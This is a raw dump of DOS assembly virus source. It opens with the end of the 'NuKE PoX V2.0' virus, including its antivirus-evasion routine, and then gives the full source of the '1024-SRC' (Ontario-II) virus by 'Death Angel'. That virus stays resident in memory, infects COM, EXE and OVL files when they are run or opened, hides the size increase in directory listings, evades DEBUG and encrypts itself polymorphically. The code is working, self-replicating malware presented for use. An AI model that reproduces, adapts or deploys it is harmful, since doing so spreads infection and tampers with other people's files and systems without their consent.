|
||
|
push cx
|
||
|
mov si,dx
|
||
|
mov cx,256h
|
||
|
av: cmp byte ptr ds:[si],2eh
|
||
|
je av1
|
||
|
inc si
|
||
|
loop av
|
||
|
av1: cmp word ptr ds:[si-2],'NA'
|
||
|
jnz av2
|
||
|
cmp word ptr ds:[si-4],'CS'
|
||
|
jz fuck_av
|
||
|
av2: cmp word ptr ds:[si-2],'NA'
|
||
|
jnz av3
|
||
|
cmp word ptr ds:[si-4],'EL'
|
||
|
jz fuck_av
|
||
|
av3: cmp word ptr ds:[si-2],'TO'
|
||
|
jnz not_av
|
||
|
cmp word ptr ds:[si-4],'RP'
|
||
|
jz fuck_av
|
||
|
not_av: pop cx
|
||
|
pop si
|
||
|
clc
|
||
|
ret
|
||
|
fuck_av: pop cx
|
||
|
pop si
|
||
|
stc
|
||
|
ret
|
||
|
Check_4_av ENDP
|
||
|
msg db "NuKE PoX V2.0 - Rock Steady"
|
||
|
old_time dw 0
|
||
|
old_date dw 0
|
||
|
file_handle dw 0
|
||
|
jump_address db 0E9h,90h,90h
|
||
|
buffer db 90h,0CDh,020h ;\
|
||
|
db 18h DUP (00) ;-Make 1Bh Bytes
|
||
|
last:
|
||
|
seg_a ends
|
||
|
end start
|
||
|
;==========================================================================
|
||
|
;=========================================================================
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
; 1024-SRC Virus (Ontario-II) by Death Angel
|
||
|
; ========
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
;
|
||
|
;This VIRUS was only written as an experiment to see how far a computer
|
||
|
;virus could go through development. This pariticular virus in its present
|
||
|
;form WILL NOT do any damage to your data or go off bouncing a ball across
|
||
|
;your screen or play Yankee Doddle, IT WILL ONLY infect programs.
|
||
|
;
|
||
|
; Virus Information:
|
||
|
; Hides: In upper RAM, requires 3K of memory.
|
||
|
; Size: 1K (exactly when attached to either EXE or COM files)
|
||
|
; ID: Seconds in date of file is set to 32 (impossible value)
|
||
|
; .COM files, the 4th byte is 'O'
|
||
|
; .EXE files, the stack pointer is 0600h
|
||
|
;
|
||
|
; Cover-Up: If loaded with DEBUG, it will remove itself from memory.
|
||
|
; When doing a DIR, it will cover up the filesize increase.
|
||
|
;
|
||
|
;Notes: Also infects on a file open if the file ends in COM,EXE or OVL
|
||
|
;
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Stack_Size Equ 512+1
|
||
|
|
||
|
Code Segment Para Public 'CODE'
|
||
|
Assume Cs:Code, Ds:Code
|
||
|
Org 0000h
|
||
|
|
||
|
Jmpfar Macro addr
|
||
|
db 0EAh
|
||
|
dd addr
|
||
|
Endm
|
||
|
|
||
|
Callfar Macro addr
|
||
|
db 09Ah
|
||
|
dd addr
|
||
|
Endm
|
||
|
|
||
|
Retfar Macro num
|
||
|
db 0CAh
|
||
|
dw num
|
||
|
Endm
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
; Do a loop to decode the rest of the virus.
|
||
|
|
||
|
Virus_Begin:
|
||
|
|
||
|
V00: Mov Bx, offset V05-V05_Back
|
||
|
V04: Mov Cx, offset Start_Code-(offset V05-V05_Back)
|
||
|
V01: Mov Al, 00h
|
||
|
V02: Add Byte ptr Cs:[Bx], Al
|
||
|
V03: Xor Al, 00h
|
||
|
Inc Bx
|
||
|
Loop V02
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
V05_Back Equ 0
|
||
|
|
||
|
V05: Sub Bx, offset Start_Code
|
||
|
Xchg Ax, Cx
|
||
|
Dec Ax
|
||
|
Int 21h
|
||
|
Or Al, Ah
|
||
|
Je Run_Prog
|
||
|
Push Ds
|
||
|
Xor Di, Di
|
||
|
Mov Ds, Di
|
||
|
Lds Ax, Dword ptr Ds:[21h*4]
|
||
|
Mov Word ptr Cs:[Bx].Saved_21, Ax
|
||
|
Mov Word ptr Cs:[Bx].Saved_21+2, Ds
|
||
|
Mov Cx, Es
|
||
|
Dec Cx
|
||
|
Mov Ds, Cx
|
||
|
Sub Word ptr Ds:[Di+03h], 3072/16
|
||
|
Mov Ax, Word ptr Ds:[Di+12h]
|
||
|
Sub Ax, 3072/16
|
||
|
Mov Word ptr Ds:[Di+12h], Ax
|
||
|
Mov Es, Ax
|
||
|
Sub Ax, 1000h
|
||
|
Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax
|
||
|
Push Cs
|
||
|
Pop Ds
|
||
|
Mov Si, Bx
|
||
|
Mov Cx, offset Start_Code
|
||
|
Cld
|
||
|
Rep Movsb
|
||
|
Mov Ds, Cx
|
||
|
Cli
|
||
|
Mov Word ptr Ds:[21h*4], offset New_21
|
||
|
Mov Word ptr Ds:[21H*4]+2, Es
|
||
|
Sti
|
||
|
Mov Ax, 4BFFh
|
||
|
Push Bx
|
||
|
Int 21h
|
||
|
Pop Bx
|
||
|
Pop Ds
|
||
|
Push Ds
|
||
|
Pop Es
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Run_Prog:
|
||
|
Lea Si, [Bx].Start_Code
|
||
|
Mov Di, 0100h
|
||
|
Cmp Bx, Di
|
||
|
Jb Run_Exe
|
||
|
|
||
|
Run_COM:
|
||
|
Push Di
|
||
|
Movsw
|
||
|
Movsw
|
||
|
Ret
|
||
|
|
||
|
Run_EXE:
|
||
|
Mov Ax, Es
|
||
|
Add Ax, 0010h
|
||
|
Add Word ptr Cs:[Si+02], Ax
|
||
|
Add Word ptr Cs:[Si+04], Ax
|
||
|
Cli
|
||
|
Mov Sp, Word ptr Cs:[Si+06]
|
||
|
Mov Ss, Word ptr Cs:[Si+04]
|
||
|
Sti
|
||
|
Jmp Dword ptr Cs:[Si+00]
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Check_Present:
|
||
|
Inc Ax
|
||
|
Iret
|
||
|
|
||
|
New_21: Cmp Ax, 0FFFFh ; Checking if resident ?
|
||
|
Je Check_Present
|
||
|
Cmp Ah, 4Bh ; Executing a program ?
|
||
|
Je Load_Program
|
||
|
Cmp Ah, 11h ; Doing a DIR ?
|
||
|
Je Find_First
|
||
|
Cmp Ah, 12h ; Doing a DIR ?
|
||
|
Je Find_Next
|
||
|
Cmp Ax, 3D00h ; Opening a file ?
|
||
|
Jne Run_21
|
||
|
Call Open_File
|
||
|
Run_21:
|
||
|
Jmpfar 0 ; Goto vector 21h
|
||
|
Saved_21 Equ $-4
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Find_First:
|
||
|
Find_Next:
|
||
|
Push Bp
|
||
|
Mov Bp, Sp
|
||
|
Cmp Word ptr [Bp+04], 1234h
|
||
|
Dos_Seg:
|
||
|
Pop Bp
|
||
|
Jb Run_21
|
||
|
Call Do_21
|
||
|
Call Save_Regs
|
||
|
Mov Ah, 2Fh
|
||
|
Call Do_21
|
||
|
Cmp Byte ptr Es:[Bx], 0FFh
|
||
|
Je F20
|
||
|
Sub Bx, +7
|
||
|
F20: Mov Al, Byte ptr Es:[Bx].1Eh
|
||
|
And Al, 1Fh
|
||
|
Cmp Al, 1Fh
|
||
|
Jne F00
|
||
|
Mov Dx, Word ptr Es:[Bx].26h
|
||
|
Mov Ax, Word ptr Es:[Bx].24h
|
||
|
Sub Ax, offset Virus_End
|
||
|
Sbb Dx, +00
|
||
|
Or Dx, Dx
|
||
|
Jb F00
|
||
|
Mov Word ptr Es:[Bx].26h, Dx
|
||
|
Mov Word ptr Es:[Bx].24h, Ax
|
||
|
F00: Call Restore_Regs
|
||
|
IRet
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Load_Program:
|
||
|
Cmp Al, 01h
|
||
|
Je Disinfect_DEBUG
|
||
|
Cmp Al, 0FFh
|
||
|
Je Infect_COMSPEC
|
||
|
Call Infect_File
|
||
|
Jmp Run_21
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Infect_COMMAND:
|
||
|
Push Dx
|
||
|
Push Ds
|
||
|
Mov Dx, offset Command_File
|
||
|
Push Cs
|
||
|
Pop Ds
|
||
|
Mov Byte ptr Ds:Command_Flag, 0FFh
|
||
|
Call Infect_File
|
||
|
Pop Ds
|
||
|
Pop Dx
|
||
|
Iret
|
||
|
|
||
|
Infect_COMSPEC:
|
||
|
Mov Ah, 51h
|
||
|
Call Do_21
|
||
|
Mov Es, Bx
|
||
|
Mov Ds, Es:[002Ch]
|
||
|
Xor Si, Si
|
||
|
Push Cs
|
||
|
Pop Es
|
||
|
LP00: Mov Di, offset COMSPEC_name
|
||
|
Mov Cx, 0004h
|
||
|
Rep Cmpsw
|
||
|
Jcxz LP20
|
||
|
LP10: Lodsb
|
||
|
Or Al, Al
|
||
|
Jne LP10
|
||
|
; Cmp Al, Byte ptr [Si]
|
||
|
Cmp Byte ptr [Si], 00
|
||
|
Jne LP00
|
||
|
Jmp Infect_COMMAND
|
||
|
LP20: Mov Dx, Si
|
||
|
Mov Byte ptr Cs:Command_Flag, 0FFh
|
||
|
Call Infect_File
|
||
|
IRet
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Disinfect_DEBUG:
|
||
|
Push Es
|
||
|
Push Bx
|
||
|
Call Do_21
|
||
|
Pop Bx
|
||
|
Pop Es
|
||
|
Call Save_Regs
|
||
|
Jb LP30
|
||
|
Xor Cx, Cx
|
||
|
Lds Si, Dword ptr Es:[Bx].12h
|
||
|
Push Ds
|
||
|
Push Si
|
||
|
Mov Di, 0100h
|
||
|
Cmp Si, Di
|
||
|
Jl DI00
|
||
|
Ja LP31
|
||
|
Lodsb
|
||
|
Cmp Al, 0E9h
|
||
|
Jne LP31
|
||
|
Lodsw
|
||
|
Push Ax
|
||
|
Lodsb
|
||
|
Cmp Al, 'O'
|
||
|
Pop Si
|
||
|
Jne LP31
|
||
|
Add Si, 103h
|
||
|
Inc Cx
|
||
|
Inc Cx
|
||
|
Pop Ax
|
||
|
Push Si
|
||
|
Push Ds
|
||
|
Pop Es
|
||
|
Jmp short DI10
|
||
|
DI00: Lea Di, Dword ptr [Bx].0Eh
|
||
|
Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2
|
||
|
Jne LP31 ; Note 4B01/decrements stack by 2
|
||
|
DI10: Lodsb
|
||
|
Cmp Al, 0BBh
|
||
|
Jne LP31
|
||
|
Lodsw
|
||
|
Push Ax
|
||
|
Lodsw
|
||
|
Cmp Ax, Word ptr Cs:[V04]
|
||
|
Pop Si
|
||
|
Jne LP31
|
||
|
Add Si, offset Start_Code-(offset V05-V05_Back)
|
||
|
Jcxz DI15
|
||
|
Rep Movsw
|
||
|
Jmp short DI25
|
||
|
|
||
|
DI15: Mov Ah, 51h
|
||
|
Call Do_21
|
||
|
Add Bx, 0010h
|
||
|
Mov Ax, [Si+06h]
|
||
|
Dec Ax
|
||
|
Dec Ax
|
||
|
Stosw
|
||
|
Mov Ax, [Si+04h]
|
||
|
Add Ax, Bx
|
||
|
Stosw
|
||
|
Movsw
|
||
|
Lodsw
|
||
|
Add Ax, Bx
|
||
|
Stosw
|
||
|
DI25: Pop Di
|
||
|
Pop Es
|
||
|
Xchg Cx, Ax
|
||
|
Mov Cx, offset Virus_End
|
||
|
Rep Stosb
|
||
|
Jmp short LP32
|
||
|
|
||
|
LP31: Pop Ax
|
||
|
Pop Ax
|
||
|
LP32: Xor Ax, Ax
|
||
|
Clc
|
||
|
LP30: Call Restore_Regs
|
||
|
Retfar 0002h
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Open_File Proc Near
|
||
|
Call Save_Regs
|
||
|
Mov Si, Dx
|
||
|
OF00: Lodsb
|
||
|
Or Al, Al
|
||
|
Je OF50
|
||
|
Cmp Al, '.'
|
||
|
Jne OF00
|
||
|
Mov Di, offset File_Exts-3
|
||
|
Push Cs
|
||
|
Pop Es
|
||
|
Mov Cx, 0003h
|
||
|
OF10: Push Cx
|
||
|
Push Si
|
||
|
Mov Cl, 03h
|
||
|
Add Di, Cx
|
||
|
Push Di
|
||
|
OF12: Lodsb
|
||
|
And Al, 5Fh
|
||
|
Cmp Al, Byte ptr Es:[Di]
|
||
|
Jne OF15
|
||
|
Inc Di
|
||
|
Loop OF12
|
||
|
Call Infect_File
|
||
|
Add Sp, +6
|
||
|
Jmp short OF50
|
||
|
OF15: Pop Di
|
||
|
Pop Si
|
||
|
Pop Cx
|
||
|
Loop OF10
|
||
|
OF50: Call Restore_Regs
|
||
|
Ret
|
||
|
Open_File Endp
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Infect_File Proc Near
|
||
|
Call Save_Regs
|
||
|
Mov Ax, 4300h
|
||
|
Call Do_21
|
||
|
Jb IF00
|
||
|
Push Cx
|
||
|
And Cl, 01h
|
||
|
Cmp Cl, 01h
|
||
|
Pop Cx
|
||
|
Jne H00
|
||
|
And Cl, 0FEh
|
||
|
Mov Ax, 4301h
|
||
|
Call Do_21
|
||
|
H00: Mov Ax, 3D02h
|
||
|
Call Do_21
|
||
|
Jnb IF02
|
||
|
IF00: Jmp IFE4
|
||
|
IF02: Xchg Bx, Ax
|
||
|
Push Cs
|
||
|
Push Cs
|
||
|
Pop Ds
|
||
|
Pop Es
|
||
|
Mov Ax, 5700h
|
||
|
Call Do_21
|
||
|
Push Dx
|
||
|
Push Cx
|
||
|
And Cl, 1Fh
|
||
|
Cmp Cl, 1Fh
|
||
|
Je IF05
|
||
|
Mov Dx, offset Exe_Header
|
||
|
Mov Cx, offset Exe_Header_End-offset Exe_Header
|
||
|
Mov Ah, 3Fh
|
||
|
Call Do_21
|
||
|
Jnb IF10
|
||
|
IF05: Stc
|
||
|
Jmp IFE2
|
||
|
IF10: Cmp Ax, Cx
|
||
|
Jne IF05
|
||
|
Xor Dx, Dx
|
||
|
Mov Cx, Dx
|
||
|
Mov Ax, 4202h
|
||
|
Call Do_21
|
||
|
Or Dx, Dx
|
||
|
Jne IF12
|
||
|
Cmp Ax, offset Virus_End+Stack_Size
|
||
|
Jb IF05
|
||
|
IF12: Cmp Word ptr Ds:Sign, 'ZM'
|
||
|
Je EXE_type
|
||
|
|
||
|
COM_type:
|
||
|
Cmp Byte ptr Ds:Sign+3, 'O'
|
||
|
Je IF05
|
||
|
Cmp Byte ptr Ds:Command_Flag, 00h
|
||
|
Je CT00
|
||
|
Sub Ax, offset Virus_End
|
||
|
Xchg Dx, Ax
|
||
|
Xor Cx, Cx
|
||
|
Mov Ax, 4200h
|
||
|
Call Do_21
|
||
|
CT00: Mov Si, offset Sign
|
||
|
Mov Di, offset Start_Code
|
||
|
Movsw
|
||
|
Movsw
|
||
|
Sub Ax, 0003h
|
||
|
Mov Byte ptr Ds:Sign, 0E9h
|
||
|
Mov Word ptr Ds:Sign+1, Ax
|
||
|
Mov Byte ptr Ds:Sign+3, 'O'
|
||
|
Add Ax, (offset V05-V05_Back)+0103H
|
||
|
Jmp short IF30
|
||
|
|
||
|
EXE_type:
|
||
|
Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
|
||
|
Je IF05
|
||
|
Cmp Word ptr Ds:Overlay_Num, 0000h
|
||
|
Jne IF05
|
||
|
Push Dx
|
||
|
Push Ax
|
||
|
Mov Cl, 04h
|
||
|
Ror Dx, Cl
|
||
|
Shr Ax, Cl
|
||
|
Add Ax, Dx
|
||
|
Sub Ax, Word ptr Ds:Size_Header
|
||
|
Mov Si, offset Start_Ip
|
||
|
Mov Di, offset Start_Code
|
||
|
Movsw
|
||
|
Movsw
|
||
|
Mov Si, offset Stack_Ss
|
||
|
Movsw
|
||
|
Movsw
|
||
|
Mov Word ptr Ds:Start_Cs, Ax
|
||
|
Mov Word ptr Ds:Stack_Ss, Ax
|
||
|
Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
|
||
|
Pop Ax
|
||
|
Pop Dx
|
||
|
Push Ax
|
||
|
Add Ax, offset Virus_End+Stack_Size
|
||
|
Jnb IF29
|
||
|
Inc Dx
|
||
|
IF29: Mov Cx, 512
|
||
|
Div Cx
|
||
|
Mov Word ptr Ds:File_Size, Ax
|
||
|
Mov Word ptr Ds:Remainder, Dx
|
||
|
Pop Ax
|
||
|
And Ax, 000Fh
|
||
|
Mov Word ptr Ds:Start_Ip, Ax
|
||
|
Add Ax, (offset V05-V05_Back)
|
||
|
|
||
|
IF30: Mov Word ptr Ds:V00+1, Ax
|
||
|
Push Ds
|
||
|
Xor Si, Si
|
||
|
Mov Ds, Si
|
||
|
Mov Ax, Word ptr Ds:[046Ch]
|
||
|
Pop Ds
|
||
|
Push Bx
|
||
|
Mov Byte ptr Ds:V01+1, Ah
|
||
|
And Ax, 000Fh
|
||
|
Xchg Bx, Ax
|
||
|
Shl Bx, 01h
|
||
|
Mov Ax, Word ptr [Bx].Random_AL
|
||
|
Mov Word ptr Ds:V03, Ax
|
||
|
Mov Di, offset Real_End
|
||
|
Mov Cx, offset Virus_End
|
||
|
Push Cx
|
||
|
Cld
|
||
|
Rep Movsb
|
||
|
Mov Bx, (offset V05-V05_Back)
|
||
|
Push Word ptr [Bx]
|
||
|
Mov Byte ptr [Bx+V05_Back], 0C3h
|
||
|
Push Bx
|
||
|
Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h
|
||
|
Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL
|
||
|
Call V04
|
||
|
Pop Bx
|
||
|
Pop Word ptr [Bx]
|
||
|
Mov Dx, offset Real_End
|
||
|
Pop Cx
|
||
|
Pop Bx
|
||
|
Mov Ah, 40h
|
||
|
Call Do_21
|
||
|
IFE1: Jb IFE2
|
||
|
Xor Dx, Dx
|
||
|
Mov Cx, Dx
|
||
|
Mov Ax, 4200h
|
||
|
Call Do_21
|
||
|
Jb IFE2
|
||
|
Mov Dx, offset Exe_Header
|
||
|
Mov Cx, offset Exe_Header_End-offset Exe_Header
|
||
|
Mov Ah, 40h
|
||
|
Call Do_21
|
||
|
IFE2: Pop Cx
|
||
|
Pop Dx
|
||
|
Jb IFE3
|
||
|
Cmp Byte ptr Ds:Command_Flag, 0FFh
|
||
|
Je IFE3
|
||
|
Or Cl, 1Fh
|
||
|
IFE3: Mov Ax, 5701h
|
||
|
Call Do_21
|
||
|
Mov Ah, 3Eh
|
||
|
Call Do_21
|
||
|
IFE4: Mov Byte ptr Cs:Command_Flag, 00h
|
||
|
Call Restore_Regs
|
||
|
Ret
|
||
|
Infect_File Endp
|
||
|
|
||
|
Do_21 Proc Near
|
||
|
Pushf
|
||
|
Call Dword ptr Cs:Saved_21
|
||
|
Ret
|
||
|
Do_21 Endp
|
||
|
|
||
|
Save_Regs:
|
||
|
Push Bp
|
||
|
Mov Bp, Sp
|
||
|
Push Bx
|
||
|
Push Cx
|
||
|
Push Dx
|
||
|
Push Si
|
||
|
Push Di
|
||
|
Push Ds
|
||
|
Push Es
|
||
|
Pushf
|
||
|
Xchg [Bp+02], Ax
|
||
|
Push Ax
|
||
|
Mov Ax, [Bp+02]
|
||
|
Ret
|
||
|
|
||
|
Restore_Regs:
|
||
|
Pop Ax
|
||
|
Xchg [Bp+02], Ax
|
||
|
Popf
|
||
|
Pop Es
|
||
|
Pop Ds
|
||
|
Pop Di
|
||
|
Pop Si
|
||
|
Pop Dx
|
||
|
Pop Cx
|
||
|
Pop Bx
|
||
|
Pop Bp
|
||
|
Ret
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
Random_AL:
|
||
|
Inc Al ; 0
|
||
|
Dec Al ; 1
|
||
|
Inc Ax ; 2
|
||
|
Inc Ax
|
||
|
Dec Ax ; 3
|
||
|
Dec Ax
|
||
|
Add Al, Cl ; 4
|
||
|
Sub Al, Cl ; 5
|
||
|
Xor Al, Cl ; 6
|
||
|
Xor Al, Ch ; 7
|
||
|
Not Al ; 8
|
||
|
Neg Al ; 9
|
||
|
Ror Al, 01h ; A
|
||
|
Rol Al, 01h ; B
|
||
|
Ror Al, Cl ; C
|
||
|
Rol Al, Cl ; D
|
||
|
Nop ; E
|
||
|
Nop
|
||
|
Add Al, Ch ; F
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
COMSPEC_name db 'COMSPEC='
|
||
|
COMMAND_file db '\COMMAND.COM',0
|
||
|
FILE_Exts db 'COMEXEOVL'
|
||
|
NUM_Exts equ 3
|
||
|
|
||
|
Start_Code dw 00000h
|
||
|
dw 0FFF0h
|
||
|
Start_Stack dw ?
|
||
|
dw 0FFFFh
|
||
|
|
||
|
Org 400h
|
||
|
Virus_End:
|
||
|
|
||
|
Saved_24 dw ?,?
|
||
|
|
||
|
Command_Flag db 0
|
||
|
|
||
|
Temp dw ?
|
||
|
|
||
|
Exe_Header:
|
||
|
Sign dw ?
|
||
|
Remainder dw ?
|
||
|
File_Size dw ?
|
||
|
Num_Real dw ?
|
||
|
Size_Header dw ?
|
||
|
Min_Above dw ?
|
||
|
Max_Above dw ?
|
||
|
Stack_Ss dw ?
|
||
|
Stack_Sp dw ?
|
||
|
CheckSum dw ?
|
||
|
Start_Ip dw ?
|
||
|
Start_Cs dw ?
|
||
|
Display_Real dw ?
|
||
|
Overlay_Num dw ?
|
||
|
Exe_Header_End:
|
||
|
|
||
|
Real_End:
|
||
|
|
||
|
Code Ends
|
||
|
End Virus_Begin
|